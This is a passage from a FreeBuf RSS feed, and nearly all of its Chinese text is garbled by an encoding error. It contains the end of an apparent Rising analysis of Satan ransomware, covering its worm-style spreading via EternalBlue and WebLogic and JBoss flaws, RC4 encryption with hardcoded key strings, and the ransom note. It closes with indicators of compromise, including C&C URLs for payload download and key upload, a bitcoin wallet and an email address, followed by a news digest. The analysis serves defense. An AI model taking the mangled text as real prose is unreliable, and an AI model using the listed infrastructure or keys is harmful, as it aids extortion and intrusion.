664<p>和线程1相比,线程2å¢žåŠ äº†ä¸€ä¸ªåˆ¤æ–ï¼Œå¦‚æžœä¼ å…¥çš„ç«¯å£æ˜¯445,则执行永æ’ä¹‹è“æ¼æ´žæ”»å‡»ï¼Œå¦åˆ™æ‰§è¡Œwebæ¼æ´žæ”»å‡»ï¼Œä¸è¿‡é’ˆå¯¹445端å£çš„æ°¸æ’ä¹‹è“æ”»å‡»ä¸ä¼šç”Ÿæ•ˆï¼Œå› 为硬编ç çš„226个端å£ä¸ä¸åŒ…å«445端å£ï¼Œå³ä½¿åŒ…å«ï¼Œä¸Šå±‚函数也ä¸ä¼šä¼ 递445端å£ã€‚å› ä¸ºçº¿ç¨‹1å°±å¯ä»¥å®Œæˆå±€åŸŸç½‘çš„445ç«¯å£æ”»å‡»äº†ï¼Œæ¤å¤„å°±ä¸ç”¨å†æ”»å‡»äº†ã€‚æ¤ç—…毒旧版本的硬编ç 端å£åˆ—表ä¸åŒ…å«445端å£ã€‚新版本的端å£åˆ—è¡¨ä¿®æ”¹äº†ï¼Œä½†æ˜¯è¿™é‡Œçš„ä»£ç æ²¡æœ‰ä¿®æ”¹ï¼Œå› æ¤è¿™é‡Œçš„åˆ¤æ–æ˜¾å¾—有些多余。</p>
665<p><img alt="image081.png" src="http://image.3001.net/images/20180720/15320550545670.png!small" width="626" height="513"></p>
666<p style="text-align: center;">图:判æ–ç«¯å£æ‰§è¡Œæ”»å‡»</p>
667<p>æ¤å¤–在执行web攻击之å‰ä¼šè®¾ç½®ä¸€ä¸ªæ ‡å¿—ä½ï¼Œå¦‚æžœç«¯å£æ˜¯443或8443åˆ™å°†æ ‡å¿—ä½è®¾ç½®ä¸º1,目的是拼凑攻击报文时,区分http还是https。httpsæœåŠ¡é»˜è®¤443端å£ï¼Œtomcatçš„httpsæœåŠ¡éœ€è¦8443端å£ã€‚</p>
668<p><img alt="image083.png" src="http://image.3001.net/images/20180720/15320551596811.png!small" width="428" height="130"><img alt="image085.png" src="http://image.3001.net/images/20180720/1532055159960.png!small" width="423" height="87"></p>
669<p style="text-align: center;">图:拼凑攻击报文</p>
670<p>之所以没有固定端å£ï¼Œå¯¹åŒä¸€ä¸ªIP使用ä¸åŒçš„端å£å¾ªçŽ¯æ”»å‡»226æ¬¡ï¼Œæ˜¯å› ä¸ºç½‘ç»œä¸æœ‰äº›æœºå™¨æ²¡æœ‰æ‰“è¡¥ä¸ï¼Œä½†æ˜¯ä¼šå°†å„ç§webæœåŠ¡çš„é»˜è®¤ç«¯å£å·ä¿®æ”¹ä¸ºå…¶å®ƒç«¯å£å·ï¼Œä½œä¸ºæ¼æ´žç¼“è§£æŽªæ–½ã€‚æ”»å‡»è€…é€šè¿‡è¿™ç§æ–¹å¼ç»•过缓解措施。这也为我们æäº†ä¸ªé†’,缓解措施很有å¯èƒ½è¢«ç»•è¿‡ï¼ŒæŠŠæ¼æ´žå½»åº•ä¿®å¤æ‰èƒ½æ›´å¤§é™åº¦çš„é¿å…被攻击。</p>
671<p>硬编ç 的内置端å£åˆ—表:</p>
672<p><img alt="image087.png" src="http://image.3001.net/images/20180720/15320551947362.png!small" width="690" height="489"></p>
673<p style="text-align: center;">图:硬编ç 的攻击端å£åˆ—表</p>
674<p>线程3和线程2çš„åŒºåˆ«ä¸»è¦æ˜¯çº¿ç¨‹2攻击的是局域网IP,线程3攻击的是内置的互è”网IP,病毒内置了大é‡çš„IPæ®µï¼Œå¾ªçŽ¯éšæœºé€‰å–攻击。</p>
675<p><img alt="image089.png" src="http://image.3001.net/images/20180720/15320552221546.png!small" width="663" height="120"></p>
676<p style="text-align: center;">图:循环攻击内置的IP段</p>
677<p>从内置的硬编ç çš„IPä¸ï¼Œéšæœºé€‰å–å°†è¦æ”»å‡»çš„IPåœ°å€æ®µã€‚</p>
678<p><img alt="image091.png" src="http://image.3001.net/images/20180720/15320552423139.png!small" width="690" height="322"></p>
679<p style="text-align: center;">å›¾ï¼šéšæœºé€‰å–</p>
680<p>线程3的攻击函数和线程2相åŒï¼Œæ”»å‡»æ¯ä¸ªIP时,都会循环攻击硬编ç çš„226个端å£ï¼ŒåŒæ ·ç”±äºŽå†…置的编ç 表ä¸ä¸å«æœ‰445端å£ï¼Œæ”»å‡»äº’è”ç½‘çš„çº¿ç¨‹ä¹Ÿæ— æ³•å¯¹445端å£å‘èµ·æ°¸æ’ä¹‹è“æ”»å‡»ï¼Œåªä¼šå‘指定的IPå‘èµ·web攻击。</p>
681<p><img alt="image093.png" src="http://image.3001.net/images/20180720/15320552688029.png!small" width="618" height="287"></p>
682<p style="text-align: center;">图:循环攻击指定的IP端å£</p>
683<p><img alt="image095.png" src="http://image.3001.net/images/20180720/15320553229382.png!small" width="639" height="524"></p>
684<p style="text-align: center;">图:判æ–ç«¯å£æ‰§è¡Œæ”»å‡»</p>
685<p>æ°¸æ’ä¹‹è“æ”»å‡»ï¼Œæ¼æ´žè§¦å‘åŽä¼šå°†down64.dllæ¤å…¥åˆ°è¢«æ”»å‡»æœºå™¨ã€‚</p>
686<p><img alt="image097.png" src="http://image.3001.net/images/20180720/15320554041095.png!small" width="690" height="98"></p>
687<p style="text-align: center;">图:永æ’ä¹‹è“æ”»å‡»</p>
688<p> </p>
689<p>down64.dll的功能是è”网下载è¿è¡Œç—…毒æ¯ä½“ï¼Œè¢«æ”»å‡»æœºå™¨ä¸æ¯’åŽï¼Œåˆä¼šå¾ªçŽ¯åŒæ ·çš„æ“ä½œï¼ŒåŠ å¯†æœ¬æœºæ–‡ä»¶å‹’ç´¢ï¼Œæ”»å‡»å…¶å®ƒæœºå™¨ã€‚</p>
690<p>webæ”»å‡»åˆ©ç”¨äº†å¤šç§æ¼æ´žï¼Œæ–‡ä»¶ä¸Šä¼ æ¼æ´žã€‚</p>
691<p><img alt="image099.png" src="http://image.3001.net/images/20180720/15320554472429.png!small" width="690" height="168"></p>
692<p style="text-align: center;">å›¾ï¼šæ–‡ä»¶ä¸Šä¼ æ¼æ´ž</p>
693<p>tomcatå¼±å£ä»¤æ”»å‡»ã€‚</p>
694<p><img alt="image101.png" src="http://image.3001.net/images/20180720/15320554854498.png!small" width="690" height="437"></p>
695<p style="text-align: center;">图:tomcatå¼±å£ä»¤æ¼æ´ž</p>
696<p>CVE-2017-10271 WebLogic WLSç»„ä»¶æ¼æ´žã€‚</p>
697<p><img alt="image103.png" src="http://image.3001.net/images/20180720/15320555318754.png!small" width="667" height="135"><img alt="image105.png" src="http://image.3001.net/images/20180720/15320555313370.png!small" width="690" height="198"></p>
698<p style="text-align: center;">图:WebLogic WLSç»„ä»¶æ¼æ´ž</p>
699<p>CVE-2017-12149 JBOOS ååºåˆ—åŒ–æ¼æ´žã€‚</p>
700<p><img alt="image107.png" src="http://image.3001.net/images/20180720/15320555832265.png!small" width="690" height="322"></p>
701<p style="text-align: center;">图:JBOOS ååºåˆ—åŒ–æ¼æ´ž</p>
702<p>åŠ å¯†æ¨¡å—分æžï¼ŒSatan勒索病毒主è¦é’ˆå¯¹æ•°æ®æ–‡ä»¶è¿›è¡ŒåŠ å¯†ï¼ŒåŠ å¯†åŽè¿½åŠ æ–‡ä»¶åŽç¼€ä¸ºâ€œ.dbgerâ€ã€‚</p>
703<p><img alt="image109.png" src="http://image.3001.net/images/20180720/15320556198174.png!small" width="690" height="304"></p>
704<p style="text-align: center;">å›¾ï¼šè¢«åŠ å¯†æ–‡ä»¶çš„çŽ°è±¡</p>
705<p>勒索模å—è¿è¡ŒåŽï¼Œå°è¯•对所有驱动器é历文件,排除以下目录:</p>
706<p><img alt="b1.png" src="http://image.3001.net/images/20180723/15323113563981.png!small" width="632" height="133"></p>
707<p>表:病毒排除的目录</p>
708<p><img alt="image111.png" src="http://image.3001.net/images/20180720/15320556785623.png!small" width="533" height="523"></p>
709<p style="text-align: center;">图:病毒ä¸åŠ å¯†çš„ç›®å½•</p>
710<p>当为如下åŽç¼€æ—¶ï¼Œä¸ä¼šåŠ å¯†ï¼š</p>
711<p><img alt="b2.png" src="http://image.3001.net/images/20180723/15323114198083.png!small" width="635" height="71"></p>
712<p>è¡¨æ ¼ï¼šç—…æ¯’æŽ’é™¤çš„åŽç¼€</p>
713<p><img alt="image113.png" src="http://image.3001.net/images/20180720/15320557314342.png!small" width="254" height="449"></p>
714<p style="text-align: center;">图:病毒ä¸åŠ å¯†çš„æ–‡ä»¶ç±»åž‹</p>
715<p>ç„¶åŽåˆ›å»ºçº¿ç¨‹å¯¹éåŽ†åˆ°çš„æ–‡ä»¶è¿›è¡ŒåŠ å¯†ï¼Œç—…æ¯’è¿˜ä¼šå°è¯•å…³é—SQL相关æœåŠ¡é˜²æ¢æ–‡ä»¶è¢«å ç”¨æ— æ³•åŠ å¯†ã€‚</p>
716<p><img alt="image115.png" src="http://image.3001.net/images/20180720/15320557641028.png!small" width="453" height="480"></p>
717<p style="text-align: center;">图:关é—SQLæœåŠ¡</p>
718<p>åŠ å¯†åŽæ–‡ä»¶å:[dbger@protonmail.com]+原始文件å+.dbger。</p>
719<p><img alt="image117.png" src="http://image.3001.net/images/20180720/15320558129637.png!small" width="419" height="146"></p>
720<p style="text-align: center;">å›¾ï¼šè¢«åŠ å¯†çš„æ–‡ä»¶ 命å规则</p>
721<p>æŠŠåŠ å¯†å¯†é’¥ä¸Šä¼ åˆ°ç»™è¿œç¨‹æœåС噍101.99.84.136。</p>
722<p><img alt="image119.png" src="http://image.3001.net/images/20180720/1532055863232.png!small" width="690" height="196"></p>
723<p style="text-align: center;">图:访问控制æœåС噍</p>
724<p>ç—…æ¯’çš„åŠ å¯†ç®—æ³•ï¼ŒåŠ å¯†æ–¹å¼:使用CryptAPIè¿›è¡ŒåŠ å¯†ï¼Œç®—æ³•ä¸ºRC4,密钥结构:[HardWareID]+k_str1+k_str2+k_str3+[PUBLIC]。</p>
725<p>密钥示例如下:</p>
726<p><img alt="image121.png" src="http://image.3001.net/images/20180720/15320559073288.png!small" width="521" height="295"><img alt="image123.png" src="http://image.3001.net/images/20180720/15320559075300.png!small" width="173" height="131"></p>
727<p style="text-align: center;">图:密钥结构</p>
728<p>使用Windows自带的CryptAPIè¿›è¡ŒåŠ å¯†ï¼ŒMD5ç®—æ³•å“ˆå¸Œå¯†é’¥ï¼ŒåŠ å¯†ç®—æ³•ä¸ºRC4。</p>
729<p><img alt="image125.png" src="http://image.3001.net/images/20180720/15320559432699.png!small" width="649" height="404"></p>
730<p style="text-align: center;">å›¾ï¼šåŠ å¯†ç®—æ³•ä¸ºRC4</p>
731<p>硬编ç 了三个å—符串,</p>
732</p>
733<pre><code>k_str1:"dfsa#@FGDS!dsaKJiewiu*#&*))__=22121kD()@#(*#@#@!DSKL909*(!#!@AA"
734k_str2:"*@#AdJJMLDML#SXAIO98390d&th2nfd%%u2j312&&dsjdAa"
735k_str3:"@!FS#@DSKkop()(290#0^^^2920-((__!#*$gf4SAddAA"。</code></pre>
736<p><img alt="image127.png" src="http://image.3001.net/images/20180720/15320560017875.png!small" width="690" height="112"></p>
737<p style="text-align: center;">图:硬编ç çš„å—符串,作为密钥的一部分</p>
738<p>HardWareIDå’ŒPUBLICéƒ½æ˜¯æ˜¯éšæœºç”Ÿæˆçš„。首先,它会å°è¯•读å–ä¿å˜åœ¨C:\Windows\Temp\KSessionä¸çš„HardWareIDå€¼ï¼Œå¦‚æžœå¤±è´¥åˆ™éšæœºç”Ÿæˆ0×40大å°å—ç¬¦ä¸²ï¼ˆå›ºå®šçš„ï¼ŒåŠ å¯†è¿‡ç¨‹åªç”Ÿæˆä¸€æ¬¡ï¼‰ï¼Œç„¶åŽå†™å…¥äº†KSession文件ä¸ã€‚ </p>
739<p><img alt="image129.png" src="http://image.3001.net/images/20180720/15320560311524.png!small" width="505" height="287"></p>
740<p style="text-align: center;">图:生æˆHardWareID </p>
741<p><img alt="image131.png" src="http://image.3001.net/images/20180720/15320560703686.png!small" width="619" height="205"></p>
742<p style="text-align: center;">图:HardWareID会被ä¿å˜åœ¨KSessionæ–‡ä»¶ä¸ </p>
743<p>åŒæ ·çš„æ–¹å¼ç”Ÿæˆé•¿åº¦ä¸º0×20大å°çš„PUBLIC值(æ¯åŠ å¯†ä¸€ä¸ªæ–‡ä»¶ç”Ÿæˆä¸€æ¬¡ï¼‰ã€‚</p>
744<p><img alt="image133.png" src="http://image.3001.net/images/20180720/15320560702833.png!small" width="506" height="309"></p>
745<p style="text-align: center;">图:生æˆPUBLIC </p>
746<p>从图ä¸å¯ä»¥çœ‹åˆ°ï¼Œæ¯ä¸ªæ–‡ä»¶çš„PUBLIC是ä¸åŒçš„。</p>
747<p><img alt="image135.png" src="http://image.3001.net/images/20180720/1532056070123.png!small" width="601" height="419"></p>
748<p style="text-align: center;">图:æ¯ä¸ªæ–‡ä»¶çš„PUBLICä¸åŒ </p>
749<p>最终HardWareIDå’ŒPUBLICéƒ½ä¼šè¿½åŠ åˆ°ï¼Œè¢«åŠ å¯†æ–‡ä»¶çš„æœ«å°¾ã€‚</p>
750<p><img alt="image137.png" src="http://image.3001.net/images/20180720/1532056070220.png!small" width="535" height="166"></p>
751<p style="text-align: center;">图:å¯ä»¥åœ¨è¢«åŠ å¯†çš„æ–‡ä»¶æœ«å°¾çœ‹åˆ°HardWareID与PUBLIC的值</p>
752<p>ç—…æ¯’ä¸ºäº†åŠ å¿«åŠ å¯†é€Ÿåº¦ï¼Œå¯¹ä¸åŒå¤§å°ï¼Œä¸åŒç±»åž‹çš„æ–‡ä»¶é‡‡å–ä¸åŒçš„åŠ å¯†ç–略,é‡è¦çš„æ–‡æ¡£ä¾‹å¦‚ wordã€excelæ–‡æ¡£å…¨éƒ¨åŠ å¯†ã€‚å…¶å®ƒæ–‡æ¡£æ ¹æ®æ–‡ä»¶å¤§å°ï¼ŒåŠ å¯†æ–‡ä»¶çº¦å‰äºŒåˆ†ä¹‹ä¸€ã€å‰äº”分之一ä¸ç‰ã€‚</p>
753<p>特殊åŽç¼€å¦‚ä¸‹ï¼Œä¸»è¦æ˜¯æ¯”较é‡è¦çš„åŠžå…¬æ–‡æ¡£ã€æºä»£ç 文档的åŽç¼€å。</p>
754<p><img alt="b3.png" src="http://image.3001.net/images/20180723/15323114792458.png!small" width="636" height="95"></p>
755<div class="simditor-table">
756<div class="simditor-resize-handle"></div>
757</div>
758<p style="text-align: center;">è¡¨ï¼šå®Œå…¨åŠ å¯†çš„ç‰¹æ®ŠåŽç¼€</p>
759<p>åŠ å¯†æ–¹å¼ä¸ºå¦‚ä¸‹å‡ ç§ï¼š </p>
760<p>1ã€å°äºŽç‰äºŽ100000000å—节 </p>
761<p>(1)特殊åŽç¼€ï¼Œå®Œå…¨åŠ å¯†ã€‚</p>
762<p>(2)其它åŽç¼€ï¼Œéƒ¨åˆ†åŠ å¯†ï¼ŒåŠ å¯†å¤§å°çš„算法 CryptSize = (FileSize / 2000) *1000,约为文件的二分之一。</p>
763<p>举个例å,文件å°äºŽç‰äºŽ100000000å—节时,zipæ ¼å¼çš„åŽ‹ç¼©åŒ…å°±ä¼šè¢«å®Œå…¨åŠ å¯†ï¼Œè€ŒRARæ ¼å¼çš„åªä¼šè¢«åŠ å¯†å¤§çº¦äºŒåˆ†ä¹‹ä¸€ï¼Œå› ä¸ºzip是病毒指定的特殊åŽç¼€ï¼Œè€ŒRARä¸åœ¨åˆ—表ä¸ã€‚</p>
764<p>2ã€å¤§äºŽ100000000 å—节的文件 </p>
765<p>(1)特殊åŽç¼€ï¼Œå®Œå…¨åŠ å¯†ã€‚</p>
766<p>(2)其它åŽç¼€ï¼Œéƒ¨åˆ†åŠ å¯†ï¼ŒåŠ å¯†å¤§å°çš„算法 CryptSize = (FileSize / 5000) *1000,约为文件的五分之一。 </p>
767<p>举个例å,文件大于100000000å—节时,zipæ ¼å¼çš„åŽ‹ç¼©åŒ…å°±ä¼šè¢«å®Œå…¨åŠ å¯†ï¼Œè€ŒRARæ ¼å¼çš„ åªä¼šè¢«åŠ å¯†å¤§çº¦äº”åˆ†ä¹‹ä¸€ï¼Œå› ä¸ºzip是病毒指定的特殊åŽç¼€ï¼Œè€ŒRARä¸åœ¨åˆ—表ä¸ã€‚</p>
768<p>å½“åŠ å¯†å®ŒæˆåŽï¼Œç—…毒会打开勒索文本æç¤ºç”¨æˆ·æ”¯ä»˜èµŽé‡‘ã€‚å‹’ç´¢ä¿¡æ¯æä¾›ä¸‰ç§è¯è¨€è‹±æ–‡ã€ä¸æ–‡å’ŒéŸ©æ–‡ï¼Œå¨èƒå—害者在三天之内å‘作者支付1个比特å¸ï¼Œå¦åˆ™æ–‡ä»¶æ— 法解密,并且é‡è¦æ–‡ä»¶è¢«å…¬å¼€ã€‚然而事实上文件å¯ä»¥è§£å¯†ï¼Œå¹¶ä¸”病毒作者也没有获å–到å—害者的文件。</p>
769<p><b>比特å¸é’±åŒ…:3EbN7FP8f8x9FPQQoJKXvyoHJgSkKmAHPY</b></p>
770<p><b>邮箱:dbger@protonmail.com</b> </p>
771<p><img alt="image001.png" src="http://image.3001.net/images/20180720/15320564393372.png!small" width="682" height="512"></p>
772<p style="text-align: center;">图:弹出勒索信æ¯</p>
773<h2>IOC</h2>
774<p>MD5</p>
775<blockquote><p>ECF5CABC81047B46977A4DF9D8D68797 病毒æ¯ä½“</p>
776<p>C0150256A864E5C634380A53290C7649<span style="font-size: 16px;"> </span>åŠ å¯†æ¨¡å—</p>
777</blockquote>
778<p>C&C</p>
779<blockquote><p><a href="http://101.99.84.136" rel="nofollow">http://101.99.84.136</a></p>
780<p><a href="http://101.99.84.136/cab/sts.exe">http://101.99.84.136/cab/sts.exe</a></p>
781<p><a href="http://101.99.84.136/cab/st.exe">http://101.99.84.136/cab/st.exe</a></p>
782<p><a href="http://101.99.84.136/data/token.php?status=ST&code=">http://101.99.84.136/data/token.php?status=ST&code=</a></p>
783<p><a href="http://101.99.84.136/data/token.php?status=BK&code=">http://101.99.84.136/data/token.php?status=BK&code=</a></p>
784<p><a href="http://101.99.84.136/data/token.php?status=DB&code=">http://101.99.84.136/data/token.php?status=DB&code=</a></p>
785<p><a href="http://101.99.84.136/data/token.php?status=ALL&code=">http://101.99.84.136/data/token.php?status=ALL&code=</a></p>
786<p><a href="http://101.99.84.136/count.php?url=">http://101.99.84.136/count.php?url=</a></p>
787</blockquote>
788<p><span style="color: rgb(159, 163, 168);"><b>*本文作者:瑞星,转载请注明æ¥è‡ªFreeBuf.COM</b></span></p>
789]]></content:encoded>
790 <wfw:commentRss>http://www.freebuf.com/articles/system/178171.html/feed</wfw:commentRss>
791 <slash:comments>10</slash:comments>
792 </item>
793 <item>
794 <title>BUFæ—©é¤é“º | åŠ å¯†æ¼æ´žå½±å“大é‡è“牙设备;电å邮件攻击急剧上å‡ï¼Œé‚®ä»¶å®‰å…¨é£Žé™©å¢žå¤§ï¼›APP 注销难引官媒关注,人民日报点评称è¦ä¿éšœä¿¡æ¯å®‰å…¨</title>
795 <link>http://www.freebuf.com/news/178730.html</link>
796 <comments>http://www.freebuf.com/news/178730.html#comments</comments>
797 <pubDate>Wed, 25 Jul 2018 23:00:54 +0000</pubDate>
798 <dc:creator>AngelaY</dc:creator>
799 <category><![CDATA[资讯]]></category>
800 <category><![CDATA[APP注销]]></category>
801 <category><![CDATA[BUFæ—©é¤é“º]]></category>
802 <category><![CDATA[ä¿¡æ¯å®‰å…¨]]></category>
803 <category><![CDATA[åŠ å¯†æ¼æ´ž]]></category>
804 <category><![CDATA[物ç†å¯†é’¥]]></category>
805 <category><![CDATA[电å邮件攻击]]></category>
806 <category><![CDATA[é’“é±¼]]></category>
807
808 <guid isPermaLink="false">http://www.freebuf.com/?p=178730</guid>
809 <description><![CDATA[稻花香里说丰年,å¬å–蛙声一片。 å„ä½ Buffer 早上好,今天是 2018 å¹´ 7 月 26 æ—¥æ˜ŸæœŸå››ï¼Œå†œåŽ†å…æœˆå四。今天份的 BUFæ—©é¤å†…å®¹æœ‰ï¼šåŠ å¯†æ¼æ´žå½±å“大é‡è“牙实现,主æµåŽ‚å•†è®¾å¤‡éƒ½å—å½±å“;电å邮件网络攻击急剧上å‡ï¼Œé‚®ä»¶å®‰å…¨é£Žé™©å¢žå¤§ï¼› è°·æŒå¼•入物ç†å¯†é’¥åŽï¼Œ8.5 万雇员都没有å†è¢«æˆåŠŸé’“é±¼ï¼›é»‘å®¢åœ¨è™šå‡ HTTP 错误页é¢ä¸éšè—登陆页é¢ï¼ŒèŽ·å– webshell 用于攻击;APP  注销难引官媒关注,人民日报点评称è¦ä¿éšœä¿¡æ¯å®‰å…¨ã€‚ 安全资讯早知é“,两分钟å¬å®Œæœ€æ–°å®‰å…¨å¿«è®¯~ 以下请看详细内容: åŠ å¯†æ¼æ´žå½±å“大é‡è“牙实现,主æµåŽ‚å•†è®¾å¤‡éƒ½å—å½±å“ è¿‘æ—¥ï¼Œå¤§é‡è“牙设备和系统被æ›å˜åœ¨ä¸¥é‡åŠ å¯†æ¼æ´ž CVE-2018-5383ï¼Œæ¼æ´žä¸»è¦æ˜¯å› 为支æŒè“ç‰™çš„è®¾å¤‡æ— æ³•å……åˆ†éªŒè¯â€œå®‰å…¨â€è“ç‰™è¿žæŽ¥æœŸé—´ä½¿ç”¨çš„åŠ å¯†å‚æ•°ã€‚这会导致é…对å‡å¼±å¹¶å¯¼è‡´è¿œç¨‹æ”»å‡»è€…获å–è®¾å¤‡ä½¿ç”¨çš„åŠ å¯†å¯†é’¥ï¼Œå¹¶æ¢å¤â€œå®‰å…¨â€è“牙连接ä¸çš„两个设备之间å‘é€çš„æ•°æ®ã€‚ ç›®å‰ï¼Œè‹¹æžœã€åšé€šã€è‹±ç‰¹å°”ã€é«˜é€šç‰å¤šå®¶ç¡¬ä»¶åŽ‚å•†éƒ½ç¡®è®¤å…¶è“牙实现和æ“作系统驱动都å—到影å“,苹果ã€åšé€šå’Œè‹±ç‰¹å°”å·²ç»å‘布了修å¤è¡¥ä¸ã€‚[æ¥æºï¼šbleepingcomputer] 电å邮件网络攻击急剧上å‡ï¼Œé‚®ä»¶å®‰å…¨é£Žé™©å¢žå¤§ ç½‘ç»œå®‰å…¨å…¬å¸ Mimecast 近期å‘布了《2018 邮件安全现状》报告,报告显示,攻击者æŒç»é’ˆå¯¹ç»ˆç«¯ç”¨æˆ·å‘èµ·é‚®ä»¶æ”»å‡»ï¼Œé‚®ä»¶æ”»å‡»æ•°é‡æ€¥å‰§ä¸Šå‡ã€‚在报告的å—访者ä¸ï¼Œå°†è¿‘ 40% çš„ C 端用户都认为自己所在公å¸çš„ CEO 是公å¸å®‰å…¨çš„薄弱环节;31% çš„ C ç«¯ç”¨æˆ·éƒ½æ›¾é€šè¿‡é‚®ä»¶ä¸æ…Žå°†æ•感数æ®å‘é€ç»™æ— 关人员。 æ¤å¤–,2017 年有 92% 的勒索软件都是通过邮件分å‘ï¼Œé€ æˆäº†è¾ƒå¤§å±å®³ã€‚90% çš„ç»„ç»‡éƒ½è¡¨ç¤ºé‚®ä»¶é’“é±¼æ”»å‡»æ•°é‡æœ‰æ‰€å¢žé•¿ã€‚ä½†æ˜¯ï¼Œåªæœ‰ 11% çš„ä¼ä¸šä¸æ–培è®å‘˜å·¥è¯†åˆ«ç½‘络攻击,而52% çš„ä¼ä¸šæ¯å¹´åªç»„织一次培è®ã€‚Mimecast CEO 表示,电å邮件攻击æŒç»å¢žé•¿ï¼Œé™¤äº†å¸¸è§„的防御之外,ä¼ä¸šè¿˜éœ€è¦é‡‡å–其他应对措施æ¥ç¡®ä¿å®‰å…¨ã€‚[æ¥æºï¼šinfosecurity] è°·æŒå¼•入物ç†å¯†é’¥åŽï¼Œ8.5 万雇员都没有å†è¢«æˆåŠŸé’“é±¼ 安全åšå®¢ KrebsOnSecurity 报é“,Google 从 2017 å¹´åˆå¼€å§‹è¦æ±‚所有雇员使用物ç†å¯†é’¥æ›¿ä»£å¯†ç ,æ¤åŽè¯¥å…¬å¸ 8.5 万å雇员没有一ä½çš„å·¥ä½œç›¸å…³å¸æˆ·è¢«æˆåŠŸé’“é±¼ã€‚ç‰©ç†å®‰å…¨å¯†é’¥æ˜¯å»‰ä»·çš„ USB 设备,å¯ä½œä¸ºåŒé‡è®¤è¯ï¼ˆ2FAï¼‰çš„æ›¿ä»£ã€‚å½“ç”¨æˆ·ç™»å½•æ—¶ï¼Œæ—¢éœ€è¦æä¾›å¯†ç ï¼Œè¿˜éœ€è¦æä¾›ç§»åŠ¨è®¾å¤‡ç‰ç‰©ç†å®‰å…¨å¯†é’¥ã€‚ Google å‘言人称,物ç†å®‰å…¨å¯†é’¥æ˜¯è®¿é—® Google æ‰€æœ‰å¸æˆ·çš„基础,自推行物ç†å®‰å…¨å¯†é’¥ä»¥æ¥ï¼Œå…¬å¸å†…é›‡å‘˜æ²¡æœ‰å†æŠ¥å‘Šè¿‡è´¦å·è¢«æŽ¥ç®¡çš„问题。[æ¥æºï¼škrebsonsecurity】 é»‘å®¢åœ¨è™šå‡ HTTP 错误页é¢ä¸éšè—登陆页é¢ï¼ŒèŽ·å– webshell 用于攻击 å®‰å…¨ç ”ç©¶äººå‘˜å‘çŽ°ï¼Œé»‘å®¢åœ¨ä¼ªé€ çš„ HTTP 错误页é¢ä¸éšè—登录表å•ã€èŽ·å– webshell 访问æƒé™ç”¨äºŽæ”»å‡»çš„è¡Œä¸ºè¿‘æœŸæœ‰æ‰€å¢žåŠ ã€‚è¿™äº›é¡µé¢å‡è£…出现 HTTP 错误,例如 404 Not Found 或 Forbiddenï¼Œä½†å®žé™…ä¸Šå´æ˜¯ç™»å½•页é¢ï¼Œå…许攻击者访问 webshell 以在æœåŠ¡å™¨ä¸Šå‘出命令。 利用 webshell,黑客å¯ä»¥ä¸Šä¼ æ¶æ„软件ã€ç½‘ç»œé’“é±¼è„šæœ¬æˆ–å…¶ä»–è½¯ä»¶ã€‚å¦‚æžœä¸æ…Žç‚¹å‡»åˆ°é¡µé¢ï¼Œå°±å¯èƒ½ä¸æ‹›ã€‚è¿™å¹¶éžæ˜¯ä¸€ç§æ–°çš„æ”»å‡»æŠ€æœ¯ï¼Œä½†è¿‘æ¥è¶Šæ¥è¶Šé¢‘ç¹ï¼Œå®¹æ˜“让ä¸ç†Ÿæ‚‰çš„人上当。[æ¥æºï¼šbleepingcomputer] APP æ³¨é”€éš¾å¼•官媒关注,人民日报点评称è¦ä¿éšœä¿¡æ¯å®‰å…¨ 近日,ä¸å›½é’年报社社会调查ä¸å¿ƒè”åˆé—®å·ç½‘,对 2002 åå—访者进行的一项调查显示,75.9% çš„å—访者é‡åˆ°è¿‡ APP è´¦å·é𾿳¨é”€çš„æƒ…况,62.9% çš„å—访者担心 APP è´¦å·æ³¨é”€éš¾ä¼šå¯¼è‡´è´¦å·è¢«ç›—用。目å‰ï¼Œå¾ˆå¤šåº”用软件商通过 APP 注册的形å¼èŽ·å–用户数æ®ï¼Œç„¶åŽå°†æ•°æ®å–出æ¥èŽ·å–æ”¶ç›Šï¼Œç»™ç”¨æˆ·é€ æˆç§ç§å›°æ‰°ã€‚ 对于应用软件商而言,设置简å•的注销通é“在技术层é¢å¹¶ä¸éš¾ï¼Œä½†ä¸šå†…人士é€éœ²ï¼Œè¿™äº›è½¯ä»¶å•†å¹¶ä¸æ„¿æ„è®©ç”¨æˆ·æ³¨é”€ï¼Œè¿™æ ·ä»–ä»¬å°±èƒ½ä¿è¯è‡ªå·±æŽŒæ¡è¶Šæ¥è¶Šå¤šçš„用户数æ®ï¼Œç”¨äºŽå°†æ¥å˜çŽ°ã€‚äººæ°‘æ—¥æŠ¥æµ·å¤–ç‰ˆè®¤ä¸ºï¼ŒAPP è´¦å·æ³¨é”€éš¾çš„行为其实是对用户éšç§çš„ä¾µçŠ¯ã€‚å¯¹äºŽæ‹’ç»æ³¨é”€è´¦æˆ·çš„行为,《电信和互è”网用户个人信æ¯ä¿æŠ¤è§„定》和网络安全法都明确了惩戒举措,但从现状æ¥çœ‹ï¼Œæƒ©ç½šåŠ›åº¦æ˜Žæ˜¾ä¸å¤Ÿå¤§ã€‚未æ¥éœ€è¦æ›´ä¸¥åŽ‰çš„åº”å¯¹ä¸¾æŽªã€‚[æ¥æºï¼šäººæ°‘网] *AngelaY […]]]></description>
810 <content:encoded><![CDATA[<blockquote><p> 稻花香里说丰年,å¬å–蛙声一片。 </p>
811</blockquote>
812<p><span style="color: rgb(0, 176, 80);"><b>å„ä½ Buffer 早上好,今天是 2018 å¹´ 7 月 26 æ—¥æ˜ŸæœŸå››ï¼Œå†œåŽ†å…æœˆå四。今天份的 BUFæ—©é¤å†…容有:</b></span><span style="font-size: 16px;"><span style="color: rgb(0, 176, 80);"><b>åŠ å¯†æ¼æ´žå½±å“大é‡è“牙实现,主æµåŽ‚å•†è®¾å¤‡éƒ½å—å½±å“ï¼›</b></span><span style="font-size: 16px;"><span style="color: rgb(0, 176, 80);"><b>电å邮件网络攻击急剧上å‡ï¼Œé‚®ä»¶å®‰å…¨é£Žé™©å¢žå¤§ï¼›</b></span> <span style="font-size: 16px;"><span style="color: rgb(0, 176, 80);"><b>è°·æŒå¼•入物ç†å¯†é’¥åŽï¼Œ8.5 万雇员都没有å†è¢«æˆåŠŸé’“é±¼ï¼›</b></span><span style="font-size: 16px;"><span style="color: rgb(0, 176, 80);"><b>é»‘å®¢åœ¨è™šå‡ HTTP 错误页é¢ä¸éšè—登陆页é¢ï¼ŒèŽ·å– webshell 用于攻击;<span style="font-size: 16px;">APP </span> <span style="font-size: 16px;">注销难引官媒关注,人民日报点评称è¦ä¿éšœä¿¡æ¯å®‰å…¨ã€‚</span></b></span></span></span></span></span></p>
